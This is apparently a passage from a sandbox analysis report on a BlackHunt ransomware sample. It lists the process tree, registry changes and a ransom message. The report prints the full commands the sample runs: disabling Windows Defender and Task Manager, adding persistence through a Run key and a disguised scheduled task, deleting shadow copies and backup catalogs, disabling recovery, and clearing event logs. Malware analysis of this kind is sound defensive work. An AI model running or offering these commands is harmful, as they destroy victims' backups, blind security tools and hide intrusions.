cmd.exe 118 PID 1108 wrote to memory of 1260 1108 cmd.exe 120 PID 1108 wrote to memory of 1260 1108 cmd.exe 120 PID 2468 wrote to memory of 2488 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 122 PID 2468 wrote to memory of 2488 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 122 PID 2468 wrote to memory of 4576 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 124 PID 2468 wrote to memory of 4576 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 124 PID 2468 wrote to memory of 836 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 126 PID 2468 wrote to memory of 836 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 126 PID 1472 wrote to memory of 456 1472 cmd.exe 128 PID 1472 wrote to memory of 456 1472 cmd.exe 128 PID 2468 wrote to memory of 2304 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 129 PID 2468 wrote to memory of 2304 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 129 PID 1424 wrote to memory of 968 1424 Conhost.exe 131 PID 1424 wrote to memory of 968 1424 Conhost.exe 131 PID 2468 wrote to memory of 2076 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 132 PID 2468 wrote to memory of 2076 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 132 PID 4792 wrote to memory of 956 4792 reg.exe 134 PID 4792 wrote to memory of 956 4792 reg.exe 134 PID 2468 wrote to memory of 2120 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 135 PID 2468 wrote to memory of 2120 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 135 PID 2468 wrote to memory of 2548 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 137 PID 2468 wrote to memory of 2548 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 137 PID 2468 wrote to memory of 3892 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 136 PID 2468 wrote to memory of 3892 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 136 PID 2488 wrote to memory of 4212 2488 cmd.exe 140 PID 2488 wrote to memory of 4212 2488 cmd.exe 140 PID 2468 wrote to memory of 1876 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 143 PID 2468 wrote to memory of 1876 2468 f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe 143 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe"C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2468 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:1980
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:64
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2124
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:1260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:1424
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:4792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:836
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2120
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:3892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2548
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:4516
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:5056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:2880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:920
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:4792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:2944
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3284
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:2800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2836
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:12156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1524
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe" /F2⤵PID:4968
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe" /F3⤵
- Creates scheduled task(s)
PID:6260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2240
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:7352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:5168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1012
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:11144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2768
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:11720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1960
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:10400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:1424
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:9584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3016
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:10752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1180
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:10756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2348
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1284
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:10336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3348
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11492
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:11636
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:12944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:5148
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5708
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5484
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:10680
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:8004
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:9588
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:11432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5660
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:11712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11444
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:10652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:11580
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:11560
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:12124
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:11364
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:7236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5716
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:12484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:11420
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:12860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:11284
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:11772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:8944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:6556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:6580
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:8844
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:12520
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:5512 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:3536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 14564⤵
- Program crash
PID:5640
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\f7a4286c231d7b4b01cf73f57f7f8a3ef18149164690c580d63a252fa40a2015.exe"2⤵PID:12936
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:6120
-
-
-
